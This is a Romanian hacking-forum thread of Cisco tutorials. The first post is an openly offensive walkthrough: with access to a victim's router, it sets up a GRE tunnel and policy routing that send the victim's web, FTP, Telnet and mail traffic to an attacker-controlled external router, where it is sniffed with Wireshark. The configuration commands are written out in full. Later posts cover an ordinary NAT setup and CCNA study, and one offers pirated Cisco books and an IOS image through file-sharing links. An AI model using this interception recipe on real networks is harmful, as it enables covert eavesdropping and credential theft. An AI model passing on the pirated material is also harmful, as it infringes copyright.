NullCode Posted October 19, 2009 Report Posted October 19, 2009 O sa urmeze o serie de Tutoriale Cisco. Le voi posta in acest thread.Sa luam un caz concret. La ce va ajuta daca aveti acces la un Router Cisco?!In primul rand, tot traficul va trece prin acel Router, dar cum ati putea intercepta tot acest trafic, avand in vedere ca nu este langa dvs(altfel am folosi direct un wireshark si am rezolva problema)?!Pentru asta exista Gre Tunnel. Ce este acest Gre tunnel?Pai un tunnel Virtual intre 2 routere.Generic Routing Encapsulation - Wikipedia, the free encyclopediaLuam imaginea urmatoare: http://img18.imageshack.us/img18/2343/ciscofun1.jpgVrem sa trimitem tot traficul victimei catre routerul nostru, astfel incat noi sa putem intercepta tot traficul.Avand acces la routerul victimei configuram astfel routerul:Construim tunnelul Gre pe Routerul Victimei: conf t //intram in interfata de configurareinterface tunnel0 //facem interfata virtual de tunnelip address 192.168.10.1 255.255.255.0 //punem un ip interfetei virtualetunnel source e0/0 //spunem de unde pleaca traficultunnel destination 80.179.20.55 //si unde se duceApoi trebuie sa ii spunem routerului ce informatii sa filtreze:access-list 101 permit tcp any any eq 443 // facem o regula de acces ce trebuie sa filtrezeaccess-list 101 permit tcp any any eq 80 // routereul, am hotarat sa primim informatii doar access-list 101 permit tcp any any eq 21 //daca se primesc pachete pe porturile 80,21,..access-list 101 permit tcp any any eq 20access-list 101 permit tcp any any eq 23access-list 101 permit tcp any any eq 25access-list 101 permit tcp any any eq 110Sa va explic a 2a comanda:access-list 101 permit tcp any any eq 80Prin aceasta ii spunem sa filtreze doar pachetele TCP ce au orice sursa si seduc catre orice destinatie, iar portul destinatie este 80.Aplicam aceasta regula(access-list) pe interfata:router-map divert-traffic // Cream o regula(o regula pentru a fowarda traficul match ip address 101 //Spunem sa filtreze dupa acces-list 101 interface Ethernet0/0 //intram in interfata e0/0 ip policy route-map divert-traffic //aplicam regula pe interfata de iesire catre internetApoi configuram pe routerul nostrul doar Gre tunnel:Attacker(config)# interface tunnel0Attacker(config-if)# ip address 192.168.10.2 255.255.255.0Attacker(config-if)# tunnel source Ethernet0/0Attacker(config-if)# tunnel destination 21.199.146.242Tot ce mai trebuie sa facem este sa ascultam traficul cu un wireshark conectat la router. 1 Quote
NullCode Posted October 19, 2009 Author Report Posted October 19, 2009 Sa spune ca avem o retea mare de calculatoare si am vrea sa configuram reteau a.i. toate PC-urile sa iasa cu un sigur IP pe internet.Vom avea nevoie sa configuram PAT/NAT pe router.Network address translation - Wikipedia, the free encyclopediaTot ce trebuie sa facem este :configure terminalip nat pool RST 170.168.2.1 170.168.2.1 netmask 255.255.255. //facem o lista de adrese alcatuita dintr-un singur IP, acesta fiind IP-ul vizibil pe internet.interface Ethernet0/0 //intram in interfata(sau portul) cu "fatza" la LANip address 10.1.1.10 255.255.255.0 //ii asignam o adresa IP si o mascaip nat inside //ii spunem routerului ca acesta este Interiorul reteleiinterface Serial0/0//intram in interfata(sau portul) cu "fatza" la internetip address 170.168.2.1 255.255.255.0//ii asignam o adresa IP si o mascaip nat outside //ii spunem routerului ca acesta este exteriorul retelei(internetul)access-list 1 permit 10.1.1.0 0.0.0.255 //construim o regula pentru a spune ce hosturi pot folosi IP-ul de internetip nat inside source list 1 pool RST overload //spunem sa faca overload pe lista de IP-uri precizata mai dvrm Quote
NullCode Posted October 19, 2009 Author Report Posted October 19, 2009 Nu e vorba ca nu vreau sa il postez, dar eu nu am invatat CCNA1 apoi CCNA2 etc, am luat o carte in care erau toate si am luat CCNA(tot direct).Pentru emulatoare de IOS(sistemul de operare al routerelor Cisco) ai nevoie de GNS3(gasesti aici http://www.gns3.net/download)Ia programul: Windows GNS3 v0.6.1 all-in-one (includes Dynamips, Pemu and WinPCAP 4.0.2)GNS3 vine cu un tutorial de cum sa il folosesti, iti explica foarte bine si foarte clar ce trebuie sa faci pentru a putea emula o retea.Daca nu gasesti imagini de IOS-uri, da un reply si bag eu unul mai bun pe rapidshare.Uploadez imediat Cartea dupa care am invatat.LE: http://rapidshare.com/files/295260947/CCNA.rar.htmlIn CCNA.rar vei gasi:cisco_press_ccna_portable_command_guide_2nd_edition.pdfsybex_cisco_ccna_study_guide_6th_edition_2007.pdfPentru CCNA mai mult de atat nu iti trebuie, dar trebuie sa exersezi destul de MULT!LE2:http://rapidshare.com/files/295263864/c3640-js.bin.html -pentru IOS, cum se foloseste citest in tutorialul de la GNS3. Succes! Quote
bucifala Posted October 24, 2009 Report Posted October 24, 2009 numi mere casco asta..... oriqm am incercat din lipsa de ocupatie Quote
Flaviusl2 Posted February 3, 2017 Report Posted February 3, 2017 Salut, poti sa mai uploadezi cartea aceea, in cazul in care o mai ai, mersi. Quote
ramonnst Posted June 9, 2017 Report Posted June 9, 2017 Salut Daca va intereseaza tutoriale Cisco gasiti mai jos: [1] https://www.youtube.com/channel/UCVJZsdei_i2G3ZimBzqcmeg [2] https://ramonnastase.ro Spor la treaba ! 1 1 Quote
stefi96 Posted June 11, 2017 Report Posted June 11, 2017 On 6/9/2017 at 3:01 PM, ramonnst said: Salut Daca va intereseaza tutoriale Cisco gasiti mai jos: [1] https://www.youtube.com/channel/UCVJZsdei_i2G3ZimBzqcmeg [2] https://ramonnastase.ro Spor la treaba ! tutoriale interesante, baiat isteț, spider tata de ce ii dai dislike la baiat ? (am o curiozatate, ce rau a vrut sa ne faca) ? 1 Quote
